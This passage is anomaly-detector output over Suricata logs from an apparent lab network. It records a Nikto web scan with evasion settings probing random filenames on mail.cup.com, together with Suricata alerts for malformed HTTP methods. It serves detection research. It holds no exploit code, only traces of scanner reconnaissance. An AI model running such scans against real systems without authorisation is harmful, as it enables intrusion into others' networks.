"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.shm\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.shm\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.shm", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.shm", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46840, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1061372302094328,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1061372302094328, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.227159+0000\",\"flow_id\":1061372302094328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.229413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46842 -> 192.168.10.154:80", "/parser/model/time": 1583349514.229413, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46842, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.229413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46842 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.btr", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.229692+0000\",\"flow_id\":1638959504063480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.229692, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1638959504063480,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.btr\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.btr\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.btr", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.btr", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46842, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1638959504063480,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1638959504063480, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.229692+0000\",\"flow_id\":1638959504063480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.231549 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46844 -> 192.168.10.154:80", "/parser/model/time": 1583349514.231549, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46844, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.231549 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46844 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.list", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.231715+0000\",\"flow_id\":212665289573775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.231715, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":212665289573775,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.list\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.list\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.list", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.list", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46844, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":212665289573775,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 212665289573775, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.231715+0000\",\"flow_id\":212665289573775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.233219 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46846 -> 192.168.10.154:80", "/parser/model/time": 1583349514.233219, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46846, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.233219 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46846 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", 